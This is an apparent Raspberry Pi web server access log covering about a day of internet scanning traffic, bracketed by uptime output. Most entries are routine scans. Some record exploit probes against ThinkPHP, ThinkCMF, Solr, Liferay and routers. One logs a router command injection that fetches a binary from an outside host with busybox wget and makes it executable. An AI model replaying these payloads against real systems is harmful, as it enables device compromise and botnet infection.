Thu May 21 06:25:06 MDT 2020 06:25:06 up 86 days, 10:53, 1 user, load average: 0.39, 0.27, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 86days 1:36m 3.49s /usr/bin/lxsession -s LXDE-pi -e LXDE 35.205.86.202 - - [21/May/2020:12:49:57 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 156.231.45.78 - - [21/May/2020:13:19:09 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 3.127.145.253 - - [21/May/2020:13:42:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.3 Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/43.4" 162.243.138.64 - - [21/May/2020:13:51:29 +0000] "GET /ReportServer HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 201.92.47.28 - - [21/May/2020:14:10:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 201.92.47.28 - - [21/May/2020:14:10:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 94.66.59.211 - - [21/May/2020:14:36:56 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 109.252.62.120 - - [21/May/2020:16:02:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 109.252.62.120 - - [21/May/2020:16:02:04 +0000] "GET / HTTP/1.1" 200 25000 "" "" 78.191.233.182 - - [21/May/2020:16:10:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 176.43.128.2 - - [21/May/2020:16:13:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 195.54.160.123 - - [21/May/2020:16:29:12 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [21/May/2020:16:44:02 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [21/May/2020:16:44:53 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.118.53.210 - - [21/May/2020:16:59:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 195.54.160.123 - - [21/May/2020:17:02:39 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 58.44.244.118 - - [21/May/2020:17:35:24 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 52.232.188.182 - - [21/May/2020:18:22:57 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 61.219.11.153 - - [21/May/2020:19:28:56 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 1.9.155.231 - - [21/May/2020:20:12:27 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 1.9.155.231 - - [21/May/2020:20:12:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.209.1.230 - - [21/May/2020:20:23:39 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 103.209.1.230 - - [21/May/2020:20:23:39 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.54.160.123 - - [21/May/2020:21:08:44 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 86.120.24.103 - - [21/May/2020:21:32:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 162.243.139.59 - - [21/May/2020:21:44:54 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 46.101.171.183 - - [21/May/2020:23:05:17 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 196.52.43.96 - - [22/May/2020:00:05:48 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 177.139.118.18 - - [22/May/2020:01:05:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.173.35.9 - - [22/May/2020:01:21:54 +0000] "GET / HTTP/1.1" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 54.93.38.146 - - [22/May/2020:02:24:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.3 Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/43.4" 83.143.86.62 - - [22/May/2020:03:21:38 +0000] "GET /Lists/admin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 83.143.86.62 - - [22/May/2020:03:21:38 +0000] "GET /admin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 188.119.54.181 - - [22/May/2020:03:23:07 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 35.205.86.202 - - [22/May/2020:03:33:23 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 189.76.84.240 - - [22/May/2020:03:49:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 195.54.160.123 - - [22/May/2020:04:03:07 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [22/May/2020:04:15:19 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [22/May/2020:04:15:19 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [22/May/2020:04:35:52 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.107.80.62 - - [22/May/2020:04:46:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 185.136.226.215 - - [22/May/2020:04:46:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 193.118.53.138 - - [22/May/2020:05:27:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 137.135.86.214 - - [22/May/2020:05:30:31 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 137.135.86.214 - - [22/May/2020:05:30:32 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 77.159.87.26 - - [22/May/2020:05:43:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 163.204.11.222 - - [22/May/2020:05:49:30 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 0 "" "Hello, World" 195.54.160.123 - - [22/May/2020:08:29:15 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 2.183.209.14 - - [22/May/2020:12:07:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 181.211.101.90 - - [22/May/2020:12:16:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" Fri May 22 06:25:08 MDT 2020 06:25:08 up 87 days, 10:53, 1 user, load average: 0.65, 0.31, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 87days 1:37m 3.49s /usr/bin/lxsession -s LXDE-pi -e LXDE